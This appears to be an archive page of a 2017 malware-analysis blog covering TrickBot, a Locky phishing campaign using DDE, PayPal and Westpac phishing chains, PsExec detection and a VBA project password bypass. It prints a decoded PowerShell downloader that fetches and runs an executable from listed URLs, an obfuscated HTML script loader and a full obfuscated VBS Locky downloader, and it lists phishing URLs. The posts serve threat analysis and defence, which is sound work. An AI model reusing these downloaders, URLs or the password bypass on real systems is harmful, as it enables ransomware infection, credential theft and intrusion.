2017

Monday, December 18, 2017

December 18, 2017

Malware - TrickBot Analysis December 2017

What's new:

New Execution flow - directory structure has changed.

Instead of the winapp folder, you need to look for this:

C:\Users\me\AppData\Roaming\services\

C:\Users\me\AppData\Roaming\services\Modules

And of course, new icon :)

Identifiers:

Microsoft Visual Basic v5.0/v6.0

Imports:
MSVBVM60.DLL - 70 functions

1 VERSIONINFO
FILEVERSION 5,0,0,0
PRODUCTVERSION 5,0,0,0
FILEOS 0x4
FILETYPE 0x1
{
BLOCK "StringFileInfo"
{
    BLOCK "040904B0"
    {
        VALUE "CompanyName", "Thadickatt House"
        VALUE "FileDescription", "Pil, ecco quanto produce il Sistema Umbria"
        VALUE "LegalCopyright", "Copyright © 2017 - DUESSE COMMUNICATION S.r.l"
        VALUE "LegalTrademarks", "Edah, should not be confused with the Haredi communal body in Israel known as the Edah"
        VALUE "ProductName", "Thadickat"
        VALUE "FileVersion", "5.00"
        VALUE "ProductVersion", "5.00"
        VALUE "InternalName", "Thadickat"
        VALUE "OriginalFilename", "Thadickat.exe"
    }
}

BLOCK "VarFileInfo"
{
    VALUE "Translation", 0x0409 0x04B0
}
}

FLOW:

Load Image	C:\Windows\SysWOW64\kernel32.dll
Load Image	C:\Windows\SysWOW64\KernelBase.dll
RegOpenKey	HKLM\System\CurrentControlSet\Control\Terminal Server
RegOpenKey	HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Load Image	C:\Windows\SysWOW64\apphelp.dll
RegOpenKey	HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Disable8And16BitMitigation
CreateFile	C:\Windows\SysWOW64\rpcss.dll
RegOpenKey	HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
RegCloseKey	HKLM\Software\Wow6432Node\Microsoft\Cryptography\Offload
CreateFile	C:\Users\Vishal Thakur\AppData\Local\Temp\~DF77D59600395B2DB0.TMP
RegOpenKey	HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
RegOPenKey	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\KnownFolders
CreateFile	C:\Users\Vishal Thakur\AppData\Roaming
CreateFile	C:\Users\Vishal Thakur\AppData\Roaming\services
CreateFile	C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe
CreateFile	C:\Windows\SysWOW64\ntmarta.dll
SetEndOfFileInformationFile	C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe
WriteFile	C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe
Thread Exit
Process Exit
CloseFile
RegOpenKey	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Uiaejdlat.exe
CreateFile	C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe

*Uiaejdlat.exe will obviously change with every binary - lookout for the reg entries and file creations.

Monday, December 4, 2017

December 04, 2017

Cracking password protected VBA Project code - macro code in complex encryption

It's pretty well documented on the internet how you can crack a password protected project code in office documents. It works almost in all cases :)

If the document is protected using a different scheme, you will not find the DPB entry for password in the hex code. This becomes a bit of an annoyance.

Here's how to crack quickly.

The file asks for a password when you try to look into the project code.

1. Save the file on your desktop.

Try to load this into a hex editor and see if you can find the DPB entry - you won't.

Now follow on to the next step.

2. Change the file extention to 'zip'

3. Now simply double-click on this archive to enter the compressed file.

You will see a bunch of stuff. Go into the 'word' folder and look for the .bin file.

Now, copy the bin file (vbaProject.bin) to a different location and open it in your favourite hex editor and search for DPB.

You will find it now.

Change this to DPx and save the file.

4. Now, replace the bin file in the archive with this new file that you just saved. Note that we are not unzipping the file at any point.

5. Move back up and rename the file extention back to .doc from .zip.

6. Now open this file in word - it will throw a bunch of errors, just click through them.

7. Now, when you go into the project, it will not ask you for a password, but will still not shoew you the code. That's ok, its expected. Don't panic, just go into the project properties and give it a new password. Save and exit.

8. Re-launch the file in Word - go to the project, it'll ask you for a password. Give it the new password that you set.

9. Enjoy.

:)

Thursday, October 19, 2017

October 19, 2017

DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis

This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.

Flow:

Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute

Email:

Subject: Emailed Invoice - *

Attachment: l_123456.doc-

Downloader:

FileName: I_099292.doc

MD5: 0910541c2ac975a49a28d7a939e48cd3

SHA1: 0f3448bd32ddf76f6b23c8f1937e71770bb0663a

SHA256: 3fa85101873d1c3447594c309ea1e324beb578843e1fab7c05189830d2def126

DDE Flow:

1. Open the doc

2. This msg pops up:

3. Nothing on the first page:

4. Scroll to the end:

5. This is the DDE code:

6. Toggle code:

7. This should give you the actual code:

This downloader was found to be serving Locky.

The above DDE code reaches out and grabs the string from arkberg-design*fi, which is Base64 encoded:

*DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AcwBoAGEAbQBhAG4AaQBjAC0AZQB4AHQAcgBhAGMAdABzAC4AYgBpAHoALwBlAHUAcgBnAGYAOAAzADcAbwByACIALAAiAGgAdAB0AHAAOgAvAC8AYwBlAG4AdAByAGEAbABiAGEAcAB0AGkAcwB0AGMAaAB1AHIAYwBoAG4AagAuAG8AcgBnAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiACwAIgAiACwAIgBoAHQAdABwADoALwAvAGMAbwBuAHgAaQBiAGkAdAAuAGMAbwBtAC8AZQB1AHIAZwBmADgAMwA3AG8AcgAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQA*cgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIA*AkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAHIAZQBrAGEAawB2AGEAMwAyAC4AZQB4AGUAIgAJAA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAGYAcAANAAoACQAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AA0ACgAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAHUAcgBsACwAIAAkAGYAcAApAA0ACgAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAANAAoACQBiAHIAZQBhAGsADQAKAH0ADQAKAEMAYQB0AGMAaAANAAoAewANAAoAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQANAAoAfQANAAoADQAKAAkADQAKAH0ADQAKAA==*

Decoded:

$urls = "hxxp://shamanic-extracts.biz/ eurgf837or","hxxp://centralbaptistchurchnj.org/ eurgf837or","","hxxp://conxibit.com/ eurgf837or"

foreach($url in $urls){

Try

{

Write-Host $url

$fp = "$env:temp\rekakva32.exe"

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp

break

}

Catch

{

Write-Host $_.Exception.Message

}

The payload is Locky.

Wednesday, September 27, 2017

September 27, 2017

Phishing - google redirect function used in link for phising WestPac bank

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake westpac page.
Just another phishing email with a twist.

Tuesday, September 26, 2017

September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything.

Syntax Highlighting:

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f; apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

function f8ce53222(ll1u8137, rx3oj311) {
var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
return jxl077g53
}

var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser

var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");

*/ zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>

</body>
</html>

Monday, September 25, 2017

September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in simple VBS, launched by WScript on a Win host.

Currently serving Locky Ransomware

Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if



    End Function

Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function

Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

UltraXgettingBelish = "User"

Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")
End Function

Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)

UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function

Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object

Advancedmantel2 ="Microsoft." + Advancedmantel2+ "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"

Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ), TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8

End Function

Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function

Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send

End Function
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")

Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
Dim MarketPlace 'As String
Dim sTempVis 'As String
Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
Dim sDecimalVis 'As String
Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

Dim MarketPlaceibility 'As String

Dim sNodeKey 'As String
Dim sParentKey 'As String



Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))

Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then


mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if

Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81


    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If

    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function

    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function

Valery = 89210

UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
Dim i
'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg

    For i = 1 To UBound(Flag1, 2)

        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next

End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"

rdde = 19

lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume next

Valery = Valery +33
UltraXgetting4 = MarketPlace + mual(i)
UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
dr1=2

rdde = rdde + 91

SetUA()
UltraXgettingFuks " d "
If UltraXgettingRickyTIcky.Status +3 = 203 Then
UltraXgettingstatus = true
Exit For
End If

goto14:
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis

F3 "",4
StateUovertakes4000.Type = 1
StateUovertakes4000.Open
StateUovertakesgetting2 22
WriteCD StateUovertakes4000,UltraXgettingResponseBody
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040 < UltraXgettingJohnSnowu Then
drba =55
UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"
End If

triada = 341
end if

Tuesday, August 1, 2017

August 01, 2017

Detecting Lateral Movement - PsExec execution with Demo

PsExec can be used quite easily on any network to move laterally from one system to another. Here's one way of detecting lateral movement.

Demo:
We'll create a PsExec session and then look for the events and note them down. These can then be used for monitoring alerts or forensic investigations.

Launch a PsExec session from one machine to another and note the time:

Machine A -

Session launched on Machine B -

Now we look through the Windows Events Viewer and find the events for this session.
Looking through the Security events, we can see in the image below the Logon event (ID 4624) was created for the session that we launched (note the timestamp).

Details of the event should give us more information on the event.

This tells us clearly that the logon was from our Machine A, through PsExec:

Next, we need to look for the service that was created as part of this session. PsExec creates the process PSEXECSV.exe on the host system when successfully launched.

In order to find that the process created on this host system (Machine B), we need to look under the System events.

Look at the details:

These are the events you need to monitor/investigate for PsExec execution on the host systems. The whole process can be automated through a SIEM for passive monitoring for security events or can be executed ad-hoc as needed for investigations and incident response.

When investigating systems post-incident, you can acquire the events files at this location in Win8* :

C:\Windows\System32\winevt\Logs

Once acquired, these files can be reviewed in the Windows Events Viewer on your investigation machine.

:)

Tuesday, July 25, 2017

July 25, 2017

TrickBot Downloader Deep Dive Analysis

The downloader comes as a Microsoft Office doc - word or excel, with Macro code.

Upon macro enablement, then VB code is executed and the payload is downloaded and executed.

Thursday, July 20, 2017

July 20, 2017

TrickBot Banking Malware - some features of interest

Here's one:

It creates this dir - c:\Users\%username%\appdata\Roaming\winapp\

Now - if you're thinking that creating this dir yourself and then read/write protecting it will make this malware not execute fully, you're wrong :)

If it cant access that location to create the directory, it simply dumps the PE on Desktop and executes from there.

Cool stuff!

Thursday, July 6, 2017

July 06, 2017

TrickBot Banking Trojan Configuration Files July 2017

Posted the config files on my github - https://github.com/vithakur/TrickBot-Config-Files

Wednesday, June 28, 2017

June 28, 2017

Petya NotPetya Quick and Dirty Analysis

I'll leave the detailed version to hasherezade :)
This is a quick look at what the malware is about and what functions it uses.

Looks for physical drives on the infected computer.